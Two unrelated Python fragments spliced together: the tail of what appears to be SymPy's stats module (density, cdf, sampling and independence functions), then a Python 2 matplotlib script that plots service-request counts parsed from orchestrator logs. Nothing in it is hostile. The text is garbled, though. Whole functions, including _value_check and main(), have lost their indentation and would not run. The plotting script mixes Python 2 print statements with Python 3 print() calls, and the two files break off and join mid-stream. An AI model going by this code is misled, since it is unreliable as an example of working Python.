    probability spaces.  Discrete variables produce Dicts.  Continuous
    variables produce Lambdas.

    Parameters
    ==========
    expr : Expr containing RandomSymbols
        The expression of which you want to compute the density value
    condition : Relational containing RandomSymbols
        A conditional expression. density(X>1, X>0) is density of X>1 given X>0
    numsamples : int
        Enables sampling and approximates the density with this many samples

    Examples
    ========
    >>> from sympy.stats import density, Die, Normal
    >>> from sympy import Symbol
    >>> x = Symbol('x')
    >>> D = Die('D', 6)
    >>> X = Normal(x, 0, 1)
    >>> density(D).dict
    {1: 1/6, 2: 1/6, 3: 1/6, 4: 1/6, 5: 1/6, 6: 1/6}
    >>> density(2*D).dict
    {2: 1/6, 4: 1/6, 6: 1/6, 8: 1/6, 10: 1/6, 12: 1/6}
    >>> density(X)(x)
    sqrt(2)*exp(-x**2/2)/(2*sqrt(pi))
    """
    # Approximate from random samples when a sample count is given.
    if numsamples:
        return sampling_density(expr, condition, numsamples=numsamples,
                                **kwargs)
    # Exact computation is delegated to the unevaluated Density object.
    return Density(expr, condition).doit(evaluate=evaluate, **kwargs)
def cdf(expr, condition=None, evaluate=True, **kwargs):
    """
    Cumulative Distribution Function of a random expression,
    optionally given a second condition.

    This function will take on different forms for different types of
    probability spaces.  Discrete variables produce Dicts.  Continuous
    variables produce Lambdas.

    Examples
    ========
    >>> from sympy.stats import density, Die, Normal, cdf
    >>> from sympy import Symbol
    >>> D = Die('D', 6)
    >>> X = Normal('X', 0, 1)
    >>> density(D).dict
    {1: 1/6, 2: 1/6, 3: 1/6, 4: 1/6, 5: 1/6, 6: 1/6}
    >>> cdf(D)
    {1: 1/6, 2: 1/3, 3: 1/2, 4: 2/3, 5: 5/6, 6: 1}
    >>> cdf(3*D, D>2)
    {9: 1/4, 12: 1/2, 15: 3/4, 18: 1}
    >>> cdf(X)
    Lambda(_z, erf(sqrt(2)*_z/2)/2 + 1/2)
    """
    # Condition first, then compute an unconditional CDF.
    if condition is not None:
        return cdf(given(expr, condition, **kwargs), **kwargs)
    # Otherwise pass work off to the ProbabilitySpace.
    result = pspace(expr).compute_cdf(expr, **kwargs)
    if evaluate and hasattr(result, 'doit'):
        return result.doit()
    return result
def where(condition, given_condition=None, **kwargs):
    """
    Returns the domain where a condition is True.

    Examples
    ========
    >>> from sympy.stats import where, Die, Normal
    >>> from sympy import symbols, And
    >>> D1, D2 = Die('a', 6), Die('b', 6)
    >>> a, b = D1.symbol, D2.symbol
    >>> X = Normal('x', 0, 1)
    >>> where(X**2<1)
    Domain: And(-1 < x, x < 1)
    >>> where(X**2<1).set
    (-1, 1)
    >>> where(And(D1<=D2 , D2<3))
    Domain: Or(And(a == 1, b == 1), And(a == 1, b == 2), And(a == 2, b == 2))
    """
    # Condition the expression first, then ask where it holds.
    if given_condition is not None:
        return where(given(condition, given_condition, **kwargs), **kwargs)
    # Otherwise pass work off to the ProbabilitySpace.
    return pspace(condition).where(condition, **kwargs)
def sample(expr, condition=None, **kwargs):
    """
    A realization of the random expression.

    Examples
    ========
    >>> from sympy.stats import Die, sample
    >>> X, Y, Z = Die('X', 6), Die('Y', 6), Die('Z', 6)
    >>> die_roll = sample(X + Y + Z) # A random realization of three dice
    """
    # Draw a single value from the sampling iterator.
    iterator = sample_iter(expr, condition, numsamples=1)
    return next(iterator)
def sample_iter(expr, condition=None, numsamples=S.Infinity, **kwargs):
    """
    Returns an iterator of realizations from the expression given a condition.

    expr: Random expression to be realized
    condition: A conditional expression (optional)
    numsamples: Length of the iterator (defaults to infinity)

    Examples
    ========
    >>> from sympy.stats import Normal, sample_iter
    >>> X = Normal('X', 0, 1)
    >>> expr = X*X + 3
    >>> iterator = sample_iter(expr, numsamples=3)
    >>> list(iterator) # doctest: +SKIP
    [12, 4, 7]

    See Also
    ========
    sample
    sampling_P
    sampling_E
    sample_iter_lambdify
    sample_iter_subs
    """
    try:
        # lambdify is much faster but not as robust
        return sample_iter_lambdify(expr, condition, numsamples, **kwargs)
    except TypeError:
        # use subs when lambdify fails: slower but almost always works
        return sample_iter_subs(expr, condition, numsamples, **kwargs)
def sample_iter_lambdify(expr, condition=None, numsamples=S.Infinity, **kwargs):
    """
    See sample_iter

    Uses lambdify for computation. This is fast but does not always work.

    Raises
    ======
    TypeError
        If lambdify cannot evaluate ``expr`` (or ``condition``) on a trial
        sample; callers fall back to ``sample_iter_subs``.
    ValueError
        From the returned generator, if the condition does not evaluate to
        a plain boolean (i.e. it contains free symbols).
    """
    if condition:
        ps = pspace(Tuple(expr, condition))
    else:
        ps = pspace(expr)

    rvs = list(ps.values)
    fn = lambdify(rvs, expr, **kwargs)
    if condition:
        given_fn = lambdify(rvs, condition, **kwargs)

    # Check that lambdify can handle the expression
    # Some operations like Sum can prove difficult
    try:
        d = ps.sample()  # a dictionary that maps RVs to values
        args = [d[rv] for rv in rvs]
        fn(*args)
        if condition:
            given_fn(*args)
    except Exception:
        # Fix: was a bare ``except:``, which also swallowed SystemExit and
        # KeyboardInterrupt; only genuine errors should trigger the fallback.
        raise TypeError("Expr/condition too complex for lambdify")

    def return_generator():
        count = 0
        while count < numsamples:
            d = ps.sample()  # a dictionary that maps RVs to values
            args = [d[rv] for rv in rvs]

            if condition:  # Check that these values satisfy the condition
                gd = given_fn(*args)
                if gd != True and gd != False:
                    raise ValueError("Conditions must not contain free symbols")
                if not gd:  # If the values don't satisfy then try again
                    continue

            yield fn(*args)
            count += 1
    return return_generator()
def sample_iter_subs(expr, condition=None, numsamples=S.Infinity, **kwargs):
    """
    See sample_iter

    Uses subs for computation. This is slow but almost always works.
    """
    if condition is not None:
        ps = pspace(Tuple(expr, condition))
    else:
        ps = pspace(expr)

    realized = 0
    while realized < numsamples:
        assignment = ps.sample()  # maps each RV to a concrete value
        if condition is not None:
            # Rejection sampling: keep only draws satisfying the condition.
            satisfied = condition.xreplace(assignment)
            if satisfied != True and satisfied != False:
                raise ValueError("Conditions must not contain free symbols")
            if not satisfied:
                continue
        yield expr.xreplace(assignment)
        realized += 1
def sampling_P(condition, given_condition=None, numsamples=1,
               evalf=True, **kwargs):
    """
    Sampling version of P.

    See Also
    ========
    P
    sampling_E
    sampling_density
    """
    count_true = 0
    count_false = 0
    for outcome in sample_iter(condition, given_condition,
                               numsamples=numsamples, **kwargs):
        # Each realization must be a definite boolean.
        if outcome != True and outcome != False:
            raise ValueError("Conditions must not contain free symbols")
        if outcome:
            count_true += 1
        else:
            count_false += 1

    result = S(count_true) / numsamples
    return result.evalf() if evalf else result
def sampling_E(expr, given_condition=None, numsamples=1,
               evalf=True, **kwargs):
    """
    Sampling version of E.

    See Also
    ========
    P
    sampling_P
    sampling_density
    """
    # Mean of the realizations drawn from the (possibly conditioned) space.
    samples = sample_iter(expr, given_condition,
                          numsamples=numsamples, **kwargs)
    result = Add(*list(samples)) / numsamples
    return result.evalf() if evalf else result
def sampling_density(expr, given_condition=None, numsamples=1, **kwargs):
    """
    Sampling version of density.

    See Also
    ========
    density
    sampling_P
    sampling_E
    """
    # Histogram of realizations: outcome -> number of occurrences.
    counts = {}
    for outcome in sample_iter(expr, given_condition,
                               numsamples=numsamples, **kwargs):
        counts[outcome] = counts.get(outcome, 0) + 1
    return counts
def dependent(a, b):
    """
    Dependence of two random expressions.

    Two expressions are independent if knowledge of one does not change
    computations on the other.

    Examples
    ========
    >>> from sympy.stats import Normal, dependent, given
    >>> from sympy import Tuple, Eq
    >>> X, Y = Normal('X', 0, 1), Normal('Y', 0, 1)
    >>> dependent(X, Y)
    False
    >>> dependent(2*X + Y, -Y)
    True
    >>> X, Y = given(Tuple(X, Y), Eq(X + Y, 3))
    >>> dependent(X, Y)
    True

    See Also
    ========
    independent
    """
    # Disjoint probability spaces guarantee independence.
    if pspace_independent(a, b):
        return False

    aux = Symbol('z', real=True)
    # Dependent iff conditioning either variable on the other changes
    # its density.
    return (density(a, Eq(b, aux)) != density(a) or
            density(b, Eq(a, aux)) != density(b))
def independent(a, b):
    """
    Independence of two random expressions.

    Two expressions are independent if knowledge of one does not change
    computations on the other.

    Examples
    ========
    >>> from sympy.stats import Normal, independent, given
    >>> from sympy import Tuple, Eq
    >>> X, Y = Normal('X', 0, 1), Normal('Y', 0, 1)
    >>> independent(X, Y)
    True
    >>> independent(2*X + Y, -Y)
    False
    >>> X, Y = given(Tuple(X, Y), Eq(X + Y, 3))
    >>> independent(X, Y)
    False

    See Also
    ========
    dependent
    """
    # Defined as the logical negation of dependence.
    return not dependent(a, b)
def pspace_independent(a, b):
    """
    Tests for independence between a and b by checking if their PSpaces have
    overlapping symbols. This is a sufficient but not necessary condition for
    independence and is intended to be used internally.

    Returns True when the symbol sets are disjoint, otherwise None
    (meaning "unknown", not "dependent").

    Notes
    =====
    pspace_independent(a, b) implies independent(a, b)
    independent(a, b) does not imply pspace_independent(a, b)
    """
    # Fix: the locals were previously cross-named (``a_symbols`` held b's
    # symbols and vice versa).  The result was unaffected because set
    # intersection is symmetric, but the naming was misleading.
    a_symbols = pspace(a).symbols
    b_symbols = pspace(b).symbols

    if len(a_symbols.intersect(b_symbols)) == 0:
        return True
    return None
def rv_subs(expr, symbols=None):
    """
    Given a random expression replace all random variables with their symbols.

    If symbols keyword is given restrict the swap to only the symbols listed.
    """
    if symbols is None:
        symbols = random_symbols(expr)
    if not symbols:
        # Nothing to replace.
        return expr
    return expr.xreplace(dict((rv, rv.symbol) for rv in symbols))
class NamedArgsMixin(object):
    """Mixin exposing ``self.args`` entries as attributes named by
    ``_argnames``.

    Subclasses set ``_argnames`` to a tuple of names; attribute lookup of
    a listed name returns the positionally corresponding member of
    ``self.args``.
    """
    _argnames = ()

    def __getattr__(self, attr):
        try:
            return self.args[self._argnames.index(attr)]
        except ValueError:
            # Fix: error message read "has not attribute".
            raise AttributeError("'%s' object has no attribute '%s'" % (
                type(self).__name__, attr))
def _value_check(condition, message):
"""
Check a condition on input value.
Raises ValueError with message if condition is not True
"""
if condition != True:
raise ValueError(message)
|
|
#!/usr/bin/python
import matplotlib.pyplot as plt
from matplotlib import *
import sys, getopt
import copy
import time
import datetime
import random
import sys
import os
import re
def get_data(file_list, type, start, finish, nice):
    """Parse orchestrator log files and collect request-count time series.

    file_list: mixed list of single log paths (strings or 1-element lists)
               and multi-element lists of paths whose series are averaged.
    start, finish: only data points numbered in [start, finish] are kept.
    type, nice: accepted but unused here.

    Returns three lists of dicts (mapped, running, refused); each dict has
    "request_list", "incoming_time" (seconds since first log line) and
    "name" keys.

    NOTE(review): written for Python 2 (`basestring`) — confirm interpreter.
    """
    mapped_reqs, running_reqs, refused_reqs = [], [], []
    # Reusable accumulator dicts; copied into the result lists per file.
    mapped_requests_dict = dict()
    mapped_requests_dict["request_list"] = []
    mapped_requests_dict["incoming_time"] = []
    mapped_requests_dict["name"] = ""
    running_requests_dict = dict()
    running_requests_dict["request_list"] = []
    running_requests_dict["incoming_time"] = []
    running_requests_dict["name"] = ""
    refused_requests_dict = dict()
    refused_requests_dict["request_list"] = []
    refused_requests_dict["incoming_time"] = []
    refused_requests_dict["name"] = ""
    file_list_iter = 0
    unfinished_test_count = False
    for element in file_list:
        start_time, data_point_count = 0, 0
        name = ""
        if isinstance(element, basestring) or len(element) == 1:
            # Single log file: extract the three series directly.
            if not isinstance(element, basestring):
                element = str(element[0])
            for line in open(element):
                # First line's timestamp anchors the relative time axis.
                if start_time == 0:
                    start_time = datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')
                # Header lines describing the test configuration build the name.
                if "| Orchestrator:" in line:
                    name = line[line.find("| Orchestrator:")+15:]
                if "| What to optimize:" in line:
                    name += "_" + line[line.find("| What to optimize:")+19:]
                if "| When to optimize:" in line:
                    name += "_" + line[line.find("| When to optimize:")+19:]
                if "| Optimize strategy:" in line:
                    name += "_" + line[line.find("| Optimize strategy:")+20:]
                # "Mapped" lines mark the start of a new data point.
                if "Mapped service_requests count:" in line:
                    data_point_count += 1
                if start <= data_point_count <= finish:
                    if "Mapped service_requests count:" in line:
                        count = line[line.find("Mapped service_requests count:")+31:]
                        mapped_requests_dict["request_list"].append(int(count))
                        sec = ((datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
                        mapped_requests_dict["incoming_time"].append(sec)
                    elif "Running service_requests count:" in line:
                        count = line[line.find("Running service_requests count:")+32:]
                        running_requests_dict["request_list"].append(int(count))
                        sec = ((datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
                        running_requests_dict["incoming_time"].append(sec)
                    elif "Refused service_requests count:" in line:
                        count = line[line.find("Refused service_requests count:")+32:]
                        refused_requests_dict["request_list"].append(int(count))
                        sec = ((datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
                        refused_requests_dict["incoming_time"].append(sec)
            # Snapshot the accumulators into the results, then reset them.
            mapped_requests_dict["name"] = (name+"_"+str(file_list[file_list_iter])).replace("\n", "")
            mapped_reqs.append(copy.copy(mapped_requests_dict))
            mapped_requests_dict["name"] = ""
            mapped_requests_dict["request_list"] = []
            mapped_requests_dict["incoming_time"] = []
            running_requests_dict["name"] = (name+"_"+str(file_list[file_list_iter])).replace("\n", "")
            running_reqs.append(copy.copy(running_requests_dict))
            running_requests_dict["name"] = ""
            running_requests_dict["request_list"] = []
            running_requests_dict["incoming_time"] = []
            refused_requests_dict["name"] = (name+"_"+str(file_list[file_list_iter])).replace("\n", "")
            refused_reqs.append(copy.copy(refused_requests_dict))
            refused_requests_dict["name"] = ""
            refused_requests_dict["request_list"] = []
            refused_requests_dict["incoming_time"] = []
        else:
            # Group of log files: parse each, then average the series.
            start_time, data_point_count = 0, 0
            name = ""
            mapped_reqs_to_avg, running_reqs_to_avg, refused_reqs_to_avg = [], [], []
            for file in element:
                mapped_requests_dict["name"] = ""
                mapped_requests_dict["request_list"] = []
                mapped_requests_dict["incoming_time"] = []
                running_requests_dict["name"] = ""
                running_requests_dict["request_list"] = []
                running_requests_dict["incoming_time"] = []
                refused_requests_dict["name"] = ""
                refused_requests_dict["request_list"] = []
                refused_requests_dict["incoming_time"] = []
                data_point_count = 0
                # NOTE(review): start_time is only reset per group, so all
                # files in the group share the first file's anchor — confirm
                # this is intended.
                for line in open(file):
                    if start_time == 0:
                        start_time = datetime.datetime.strptime(line[:22], '%Y-%m-%d %H:%M:%S,%f')
                    if "| Orchestrator:" in line:
                        name = line[line.find("| Orchestrator:") + 15:]
                    if "| What to optimize:" in line:
                        name += "_" + line[line.find("| What to optimize:") + 19:]
                    if "| When to optimize:" in line:
                        name += "_" + line[line.find("| When to optimize:") + 19:]
                    if "| Optimize strategy:" in line:
                        name += "_" + line[line.find("| Optimize strategy:") + 20:]
                    if "Mapped service_requests count:" in line:
                        data_point_count += 1
                    if start <= data_point_count <= finish:
                        if "Mapped service_requests count:" in line:
                            count = line[line.find("Mapped service_requests count:") + 31:]
                            mapped_requests_dict["request_list"].append(int(count))
                            sec = ((datetime.datetime.strptime(line[:22],
                                                               '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
                            mapped_requests_dict["incoming_time"].append(sec)
                        elif "Running service_requests count:" in line:
                            count = line[line.find("Running service_requests count:") + 32:]
                            running_requests_dict["request_list"].append(int(count))
                            sec = ((datetime.datetime.strptime(line[:22],
                                                               '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
                            running_requests_dict["incoming_time"].append(sec)
                        elif "Refused service_requests count:" in line:
                            count = line[line.find("Refused service_requests count:") + 32:]
                            refused_requests_dict["request_list"].append(int(count))
                            sec = ((datetime.datetime.strptime(line[:22],
                                                               '%Y-%m-%d %H:%M:%S,%f')) - start_time).total_seconds()
                            refused_requests_dict["incoming_time"].append(sec)
                mapped_requests_dict["name"] = (name + "_AVG_" + str(file_list[file_list_iter])).replace("\n", "")
                mapped_reqs_to_avg.append(copy.copy(mapped_requests_dict))
                running_requests_dict["name"] = (name + "_AVG_" + str(file_list[file_list_iter])).replace("\n", "")
                running_reqs_to_avg.append(copy.copy(running_requests_dict))
                refused_requests_dict["name"] = (name + "_AVG_" + str(file_list[file_list_iter])).replace("\n", "")
                refused_reqs_to_avg.append(copy.copy(refused_requests_dict))
                mapped_requests_dict["name"] = ""
                mapped_requests_dict["request_list"] = []
                mapped_requests_dict["incoming_time"] = []
                running_requests_dict["name"] = ""
                running_requests_dict["request_list"] = []
                running_requests_dict["incoming_time"] = []
                refused_requests_dict["name"] = ""
                refused_requests_dict["request_list"] = []
                refused_requests_dict["incoming_time"] = []
            # Get the longest list len
            longest_list = len(mapped_reqs_to_avg[0]["request_list"])
            for x in range(0, len(mapped_reqs_to_avg)):
                if len(mapped_reqs_to_avg[x]["request_list"]) > longest_list:
                    longest_list = len(mapped_reqs_to_avg[x]["request_list"])
            # Average dicts
            avg_mapped_requests_dict = dict()
            avg_mapped_requests_dict["request_list"] = []
            avg_mapped_requests_dict["incoming_time"] = []
            avg_mapped_requests_dict["name"] = ""
            avg_running_requests_dict = dict()
            avg_running_requests_dict["request_list"] = []
            avg_running_requests_dict["incoming_time"] = []
            avg_running_requests_dict["name"] = ""
            avg_refused_requests_dict = dict()
            avg_refused_requests_dict["request_list"] = []
            avg_refused_requests_dict["incoming_time"] = []
            avg_refused_requests_dict["name"] = ""
            # Point-wise average across the group; shorter runs simply
            # contribute fewer samples at the tail.
            inc_summa, req_summa, log_file_counter = 0, 0, 0
            for i in range(0, longest_list):
                for m in mapped_reqs_to_avg:
                    try:
                        inc_summa += m["incoming_time"][i]
                        req_summa += m["request_list"][i]
                        log_file_counter += 1
                    except:
                        unfinished_test_count = True
                        # in this case, the current test is shorter than the others
                        pass
                avg_mapped_requests_dict["incoming_time"].append(round(inc_summa / log_file_counter, 2))
                avg_mapped_requests_dict["request_list"].append(int(req_summa / log_file_counter))
                avg_mapped_requests_dict["name"] = mapped_reqs_to_avg[0]["name"]
                inc_summa, req_summa, log_file_counter = 0, 0, 0
            for i in range(0, longest_list):
                for m in running_reqs_to_avg:
                    try:
                        inc_summa += m["incoming_time"][i]
                        req_summa += m["request_list"][i]
                        log_file_counter += 1
                    except:
                        # in this case, the current test is shorter than the others
                        pass
                avg_running_requests_dict["incoming_time"].append(round(inc_summa / log_file_counter, 2))
                avg_running_requests_dict["request_list"].append(int(req_summa / log_file_counter))
                avg_running_requests_dict["name"] = running_reqs_to_avg[0]["name"]
                inc_summa, req_summa, log_file_counter = 0, 0, 0
            for i in range(0, longest_list):
                for m in refused_reqs_to_avg:
                    try:
                        inc_summa += m["incoming_time"][i]
                        req_summa += m["request_list"][i]
                        log_file_counter += 1
                    except:
                        # in this case, the current test is shorter than the others
                        pass
                avg_refused_requests_dict["incoming_time"].append(round(inc_summa / log_file_counter, 2))
                avg_refused_requests_dict["request_list"].append(int(req_summa / log_file_counter))
                avg_refused_requests_dict["name"] = refused_reqs_to_avg[0]["name"]
                inc_summa, req_summa, log_file_counter = 0, 0, 0
            mapped_reqs.append(copy.copy(avg_mapped_requests_dict))
            running_reqs.append(copy.copy(avg_running_requests_dict))
            refused_reqs.append(copy.copy(avg_refused_requests_dict))
        file_list_iter += 1
    if unfinished_test_count:
        # Yellow ANSI warning: at least one averaged run ended early.
        print ('\x1b[1;33;0m' + 'There are one or more unfinished tests!!!' + '\x1b[0m')
    return mapped_reqs, running_reqs, refused_reqs
def separate_and_avg(log_files):
    """Split a comma-separated log-file argument into plot groups.

    ``log_files`` is the raw CLI string, e.g. ``"a.log,[b.log,c.log],d.log"``.
    Files inside ``[...]`` form one group to be averaged.  With brackets
    present, returns a list of lists of paths; without brackets, returns a
    flat list of paths.  Returns None (after printing the error) on failure.
    """
    try:
        result = []
        if "[" in log_files:
            avg_log_files = log_files.split(",")
            # where are [ and ] characters:
            start = [i for i, s in enumerate(avg_log_files) if '[' in s]
            end = [i for i, s in enumerate(avg_log_files) if ']' in s]
            if len(start) != len(end):
                print("The number of [ and ] is not equal!!")
                # Fix: was a bare ``raise`` with no active exception, which
                # raised a confusing RuntimeError; raise a real error instead.
                raise ValueError("Unbalanced brackets in log file list")
            # delete special characters:
            avg_log_files = ([s.replace('[', '') for s in avg_log_files])
            avg_log_files = ([s.replace(']', '') for s in avg_log_files])
            # merge those items in the list that were in the same parentheses
            correction = 0
            for k in range(0, len(start)):
                avg_log_files[(start[k]-correction):(end[k]+1-correction)] = \
                    [','.join(avg_log_files[(start[k]-correction):(end[k]+1-correction)])]
                correction += end[k] - start[k]
            # re-split each group into a list of paths, dropping empties
            for element in avg_log_files:
                while "." in element:
                    tmp_element = []
                    element = element.split(",")
                    for i in element:
                        if i != '':
                            tmp_element.append(i)
                    element = tmp_element
                result.append(element)
            # print() calls (not Python 2 print statements) keep this
            # usable under both Python 2 and 3.
            print("result::")
            for x in result:
                print(x)
            return result
        else:
            return log_files.split(",")
    except Exception as e:
        print(e)
        print("Separate file error!")
def main(argv):
mapped_online_req_list = None
mapped_offline_req_list = None
mapped_hybrid_req_list = None
running_online_req_list = None
running_offline_req_list = None
running_hybrid_req_list = None
refused_online_req_list = None
refused_offline_req_list = None
refused_hybrid_req_list = None
start_count = 0
finish_count = float('inf')
path = ""
nice, nolegend = False, False
format = "png"
mark_every = 50
marker_size = 4
try:
opts, args = getopt.getopt(argv, "hs:f:", ["online_log_files=", "offline_log_files=", "hybrid_log_files=",
"dir=", "nice", "format=", "nolegend", "markersize=",
"markevery=", "s=", "f="])
except getopt.GetoptError:
print 'Invalid argument!!! create_plots.py ' \
'--online_log_files=<online_log_file1,[online_log_file2,online_log_file3],' \
'online_log_file4 ...> --offline_log_files=<offline_log_file1,offline_log_file2,...> ' \
'--hybrid_log_files=<hybrid_log_file1,hybrid_log_file2,...> ' \
'--dir=<directory name> --s=<start of interval> --f=<end of interval> --nice --format=<pdf or png> ' \
'--nolegend --markersize=<recommended:5> --markevery=<recommended:40-70>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'create_plots.py ' \
'--online_log_files=<online_log_file1,[online_log_file2,online_log_file3],' \
'online_log_file4 ...> --offline_log_files=<offline_log_file1,offline_log_file2,...> ' \
'--hybrid_log_files=<hybrid_log_file1,hybrid_log_file2,...> ' \
'--dir=<directory name> --s=<start of interval> --f=<end of interval> --nice --format=<pdf or png> ' \
'--nolegend --markersize=<recommended:5> --markevery=<recommended:40-70>'
sys.exit()
elif opt in ("--online_log_files="):
online_log_files = arg
elif opt in ("--offline_log_files="):
offline_log_files = arg
elif opt in ("--hybrid_log_files="):
hybrid_log_files = arg
elif opt in ("--dir="):
path = arg
elif opt in ("--s="):
start_count = int(arg)
elif opt in ("--f="):
finish_count = int(arg)
elif opt in ("--nice"):
nice = True
elif opt in ("--nolegend"):
nolegend = True
elif opt in ("--format="):
if arg == "pdf" or arg == "png":
format = arg
else:
print 'Invalid format! Only pdf or png!'
sys.exit()
elif opt in ("--markersize="):
marker_size = int(arg)
elif opt in ("--markevery="):
mark_every = int(arg)
else:
print 'Bad parameters! Use python create_plots.py --help'
sys.exit()
print "argument:::::"
print (sys.argv)
print "arg0" + sys.argv[0]
print "arg1" + sys.argv[1]
print "arg2" + sys.argv[2]
try:
online_files = separate_and_avg(online_log_files)
mapped_online_req_list, running_online_req_list, refused_online_req_list = \
get_data(online_files, "Online", start_count, finish_count, nice)
except Exception as e:
print e
print "The program runs without online log file."
try:
offline_files = separate_and_avg(offline_log_files)
mapped_offline_req_list, running_offline_req_list, refused_offline_req_list = \
get_data(offline_files, "Offline", start_count, finish_count, nice)
except Exception as e:
print e
print "The program runs without offline log file."
try:
hybrid_files = separate_and_avg(hybrid_log_files)
mapped_hybrid_req_list, running_hybrid_req_list, refused_hybrid_req_list = \
get_data(hybrid_files, "Hybrid", start_count, finish_count, nice)
except Exception as e:
print e
print "The program runs without hybrid log file."
if path == "":
raise ValueError("Have to give a saving directory! Example: --dir=test100")
if not os.path.exists(path):
os.mkdir(path)
if path[:-1] != "/":
path = path + "/"
colors_ls = ['red', 'blue', 'green', 'yellow', 'skyblue', 'yellowgreen', 'black', 'orange', 'magenta', 'slategray']
lines_ls = [[8, 4, 2, 4, 2, 4], [4, 2], [], [8, 4, 4, 2], [8, 4, 2, 4], [5, 2, 10, 5], []]
markers_ls = ['o', 'v', '+', 's', '*', '', '|', 'x']
colors_iter = iter(['red', 'blue', 'green', 'yellow', 'skyblue', 'yellowgreen', 'black', 'orange', 'magenta', 'slategray'])
lines_iter = iter([[8, 4, 2, 4, 2, 4], [4, 2], [], [8, 4, 4, 2], [8, 4, 2, 4], [5, 2, 10, 5], []])
markers_iter = iter(['o', 'v', '+', 's', '*', '', '|', 'x'])
on_act_colors, on_act_lines, on_act_marker, off_act_colors, off_act_lines, off_act_marker, hy_act_colors, \
hy_act_lines, hy_act_marker = [], [], [], [], [], [], [], [], []
# Create mapped picture
if mapped_online_req_list is not None:
for element in mapped_online_req_list:
try:
color = colors_iter.next()
except:
color = random.choice(colors_ls)
try:
line = lines_iter.next()
except:
line = random.choice(lines_ls)
try:
marker = markers_iter.next()
except:
marker = random.choice(markers_ls)
finally:
on_act_marker.append(marker)
on_act_colors.append(color)
on_act_lines.append(line)
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
if mapped_offline_req_list is not None:
for element in mapped_offline_req_list:
try:
color = colors_iter.next()
except:
color = random.choice(colors_ls)
try:
line = lines_iter.next()
except:
line = random.choice(lines_ls)
try:
marker = markers_iter.next()
except:
marker = random.choice(markers_ls)
finally:
off_act_marker.append(marker)
off_act_colors.append(color)
off_act_lines.append(line)
label = element["name"].replace('/', '_').replace('-', '_').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
if mapped_hybrid_req_list is not None:
for element in mapped_hybrid_req_list:
try:
color = colors_iter.next()
except:
color = random.choice(colors_ls)
try:
line = lines_iter.next()
except:
line = random.choice(lines_ls)
try:
marker = markers_iter.next()
except:
marker = random.choice(markers_ls)
finally:
hy_act_marker.append(marker)
hy_act_colors.append(color)
hy_act_lines.append(line)
label = element["name"].replace('/', '_').replace('-', '_').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
plt.grid('on')
plt.title('Accepted incoming service requests')
plt.ylabel('Accepted requests count')
plt.xlabel('Incoming requests')
plt.xticks()
if start_count != 0 or finish_count != float('inf'):
plt.xlim(xmin=start_count, xmax=finish_count)
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
if nolegend:
plt.legend().set_visible(False)
plt.savefig(path + "mapped_requests" + str(time.ctime()).replace(' ', '_').replace(':', '-') + "." + format,
bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create mapped picture with time axis
if mapped_online_req_list is not None:
i = 0
for element in mapped_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if mapped_offline_req_list is not None:
i = 0
for element in mapped_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if mapped_hybrid_req_list is not None:
i = 0
for element in mapped_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(element["incoming_time"], element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.grid('on')
plt.title('Accepted incoming service requests')
plt.ylabel('Accepted requests count')
plt.xlabel('Sec')
lgd = plt.legend(loc='upper left', bbox_to_anchor=(0, -0.1), numpoints=1)
#TODO: fix zoom with time axis too
if nolegend:
plt.legend().set_visible(False)
plt.savefig(path + "mapped_requests_with_time_axis_" +
str(time.ctime()).replace(' ', '_').replace(':', '-') + "." + format,
bbox_extra_artists=(lgd,), bbox_inches='tight')
plt.clf()
# Create Running picture
if running_online_req_list is not None:
i = 0
for element in running_online_req_list:
color = on_act_colors[i]
line = on_act_lines[i]
marker = on_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if running_offline_req_list is not None:
i = 0
for element in running_offline_req_list:
color = off_act_colors[i]
line = off_act_lines[i]
marker = off_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
if running_hybrid_req_list is not None:
i = 0
for element in running_hybrid_req_list:
color = hy_act_colors[i]
line = hy_act_lines[i]
marker = hy_act_marker[i]
label = element["name"].replace('/', '_').replace('-', '').replace('.', '_')
plt.plot(range(0, len(element["request_list"])), element["request_list"], color=color,
label=label[:80], dashes=line, marker=marker, markersize=marker_size,
markevery=mark_every)
i += 1
plt.grid('on')
plt.title('Currently running (mapped) requests in the NFFG')
plt.ylabel('Requests count')
plt.xlabel('Incoming requests')
